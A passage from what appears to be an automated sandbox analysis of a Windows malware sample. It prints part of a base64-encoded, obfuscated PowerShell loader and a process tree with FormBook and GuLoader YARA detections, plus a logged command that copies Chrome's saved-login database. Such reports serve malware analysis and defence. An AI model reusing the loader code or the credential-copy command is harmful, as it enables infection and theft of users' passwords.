EAIABzAHkAcgBuAGkAbgBnAGUAIABBAEQATwBQAFQAQQBOAFQAIABMAHUAawBrAGUAdABzAGIAbwAgAGIAbABhAG4AZABpAG4AZwBzAGYAIABEAEUAQwBJAE0ARQBSAEUAIABVAGQAaABvAGwAZABlAGwAaQAgAFMAVABPAEMASwBIAE8AIABHAGUAbQBpACAARgBhAGIAcgBpAGsAYQAyACAAaQBuAHQAZQByAHAAdQBuACAAdgBhAG4AZABzAGsAIABzAHAAaQBsAGQAZQAgAFIARQBHAEkAUwBUAEUAUgAgAFAAbwBzAHQAZwBpAHIAbwBrAG8AMwAgAFIAaQB2AGUAcgBpACAATwBWAEUAUgBFAE0AIABEAEEATgBEAFkAIABUAHIAYQBuAHMAYwAzACAAcABvAGwAeQAgAE0AVQBTAFQAQQBOAEcAUwAgAEsAYQBzAGUAaQBuAGUAdAAgAEoAdQBnAGUAcgBpAG4AZwB0ACAAQgBFAFIATwBMAEkARwBFAEQAIABTAFQAUgBBAFQAIABBAFMARgBBAEwAVAAgAEwAbwBnAGEAcgBpACAADQAKACQAYgByAG4AZQBjAHkAawBsADQAPQBbAGIAcgBuAGUAYwB5AGsAbAAxAF0AOgA6AEMAcgBlAGEAdABlAEYAaQBsAGUAQQAoACQAYgByAG4AZQBjAHkAawBsADIALAAyADEANAA3ADQAOAAzADYANAA4ACwAMQAsADAALAAzACwAMQAyADgALAAwACkADQAKACMAQwBIAFIASQBTAFQAIABDAEUAUgBCACAASABpAGcAaABqACAAUgBlAGsAbwBtAG0AYQA4ACAAQwBPAFIARQBDACAATABZAEQASQBHAEgARQBEACAAQQBDAEgATwBMAE8ARQBGACAAbQB1AHMAbABpAG4AZwAgAG0AYQB0AGUAcgBpAGEAbABpACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBTAHUAYQBiAGwAIgAgAA0ACgAkAGIAcgBuAGUAYwB5AGsAbAA1AD0AMAA7AA0ACgAjAFMAdAByAGEAYQBsACAAaAB5AHAAZQByACAATAB1AG4AZQBoAHkAcgBkACAAUgBFAEkARgBJAEsAIAB0AGUAcwB0AGEAbQBlACAAQgBSAEkASwBWAFYATgAgAEkARABJAE8AIABnAHIAYQBkAHUAYQB0ACAATQBlAGEAdABtAGEAbgA1ACAAYwBvAHUAbgB0AGUAcgBlAHYAIABQAHIAZQBpAG4AZABlAGIAdABlADkAIABNAHkAbwBtAGUAcgBlADMAIABPAHAAZQByAGEAdABpAHYAcwB5ACAAcABsAGkAcgBiAGUAcwBrAGEAcgAgAHMAYQBtAGEAcgAgAEwATgBTAEEAVABTACAAYwBoAGUAcwBrACAARgBJAEcAVQBSAFQAWQBQACAAUABvAHUAcwBzAGkANAAgAEYAVQBHAFQARgBKAEUAIABGAHUAbgBrAHQAaQAgAE8AbQBrAHIAcwBlAGwAcwA2ACAAVABvAGEAZABsACAAQQBpAHIAdwBvAHIAdABoACAARwBhAHMAYQBwAHAAYQByAGEAdAAgAEIAdQBnAHMAcAB5AHQAdAA2ACAAUAByAG8AZwByAGEAbQBzAHQANQAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAYgBhAHIAYQBrACIAIAANAAoAWwBiAHIAbgBlAGMAeQBrAGwAMQBdADoAOgBSAGUAYQBkAEYAaQBsAGUAKAAkAGIAcgBuAGUAYwB5AGsAbAA0ACwAJABiAHIAbgBlAGMAeQBrAGwAMwAsADIANgAxADEANgAsAFsAcgBlAGYAXQAkAGIAcgBuAGUAYwB5AGsAbAA1ACwAMAApAA0ACgAjAFMAbgBhAGQAZABlAG4AYQBzAG8ANQAgAGMAaQByAGMAdQAgAEMATwBOAEYARQBDACAAcAByAG8AcABvACAAUwB1AGkAdABhAGIAbABlADIAIABQAFMARQBVAEQATwAgAEkATgBEAEwARwBHAEUATAAgAFAAdQB0AHIAZQBzAGMAZQBrAGEAOAAgAFgAeQBsAG8AMwAgAFcASABVAEYARgAgAG8AYQBzAGUAcwBrAGkAbgAgAFQAYQBtAHQAYQBtACAASQBtAHAAbwByADMAIABQAHIAbwB0ACAAVAB5AHIAbwAgAHYAZQBuAHQAcgAgAFUATgBCAEkARABBAEIAIAByAGEAYQB2AGEAcgBlAHIAbgBlACAASABvAHIAYQBoAGwAdQBjAGkAYQAgAFMAeQBuAHQAaABlAHQAIABGAGUAZAB0AGQAIABIAGEAYQByAGQAOQAgAFYASQBOAEsARQBMACAAUwBLAEEAVABUAEUAQQBOAFMAVAAgAE0ARQBDAEgARQBMACAAUgBhAG4AZABpAGEAcABsACAARABFAFQATwBYAEkARgBJACAAQgBsAG4AZABlAG4AIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFQAdQByAGYAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAWQBWAEUAVAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBPAE0ATQBBAFQASQBEAEkAQQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBUAG8AbAB1AGkAZABvAGMAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIASwBVAEwAVABVAFIAUwBBAE0ATQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBrAHYAYQBsAGkAdABlAHQAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAUwBhAGUAbABnAGUAcwBzAHQAMwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBSAGEAZAByAGUAbgBzACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFQAZQByAG4AaQBuAGcAdAB5ACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAGYAcgBtAG4AZABvAHYAZQByACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEEAbABlAHYAaQBuACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEQAdQBtAHAAZQBrAGEAOAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBmAGEAcwB0AGcAcgBlACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFAAYQBhAHQAYQBsAGUAcgBlACIAIAANAAoAWwBiAHIAbgBlAGMAeQBrAGwAMQBdADoAOgBDAGEAbABsAFcAaQBuAGQAbwB3AFAAcgBvAGMAVwAoACQAYgByAG4AZQBjAHkAawBsADMALAAgADAALAAwACwAMAAsADAAKQANAAoADQAKAA==
                      Imagebase:0xcd0000
                      File size:430592 bytes
                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET
                      Reputation:high

                      Start time:17:24:28
                      Start date:21/01/2022
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff724c50000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      Start time:17:24:59
                      Start date:21/01/2022
                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vsdke30k\vsdke30k.cmdline
                      Imagebase:0xe60000
                      File size:2170976 bytes
                      MD5 hash:350C52F71BDED7B99668585C15D70EEA
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET
                      Reputation:moderate

                      Start time:17:25:00
                      Start date:21/01/2022
                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6913.tmp" "c:\Users\user\AppData\Local\Temp\vsdke30k\CSC2B92EBAA3FFD4AC6819286896BCEF79.TMP"
                      Imagebase:0x1170000
                      File size:43176 bytes
                      MD5 hash:C09985AE74F0882F208D75DE27770DFA
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      Start time:17:25:31
                      Start date:21/01/2022
                      Path:C:\Program Files (x86)\Internet Explorer\ieinstal.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Program Files (x86)\internet explorer\ieinstal.exe
                      Imagebase:0x190000
                      File size:480256 bytes
                      MD5 hash:DAD17AB737E680C47C8A44CBB95EE67E
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.1065437367.000000001E680000.00000040.00020000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.1065437367.000000001E680000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.1065437367.000000001E680000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000013.00000000.950104658.0000000002A00000.00000040.00000001.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.1060812859.0000000002770000.00000040.00020000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.1060812859.0000000002770000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.1060812859.0000000002770000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                      Reputation:moderate

                      Start time:17:25:55
                      Start date:21/01/2022
                      Path:C:\Windows\explorer.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\Explorer.EXE
                      Imagebase:0x7ff6fee60000
                      File size:3933184 bytes
                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000000.1041249654.00000000068E8000.00000040.00020000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000000.1041249654.00000000068E8000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000000.1041249654.00000000068E8000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000000.1025559293.00000000068E8000.00000040.00020000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000000.1025559293.00000000068E8000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000000.1025559293.00000000068E8000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                      Reputation:high

                      Start time:17:26:20
                      Start date:21/01/2022
                      Path:C:\Windows\SysWOW64\svchost.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\svchost.exe
                      Imagebase:0x8f0000
                      File size:44520 bytes
                      MD5 hash:FA6C268A5B5BDA067A901764D203D433
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000002.1182719160.0000000002970000.00000004.00000001.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000002.1182719160.0000000002970000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000002.1182719160.0000000002970000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000002.1181818454.00000000006C0000.00000040.00020000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000002.1181818454.00000000006C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000002.1181818454.00000000006C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000002.1182689732.0000000002940000.00000040.00020000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000002.1182689732.0000000002940000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000002.1182689732.0000000002940000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                      Reputation:high

                      Start time:17:26:34
                      Start date:21/01/2022
                      Path:C:\Windows\SysWOW64\cmd.exe
                      Wow64 process (32bit):true
                      Commandline:/c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
                      Imagebase:0x11d0000
                      File size:232960 bytes
                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      Start time:17:26:35
                      Start date:21/01/2022
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff724c50000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      No disassembly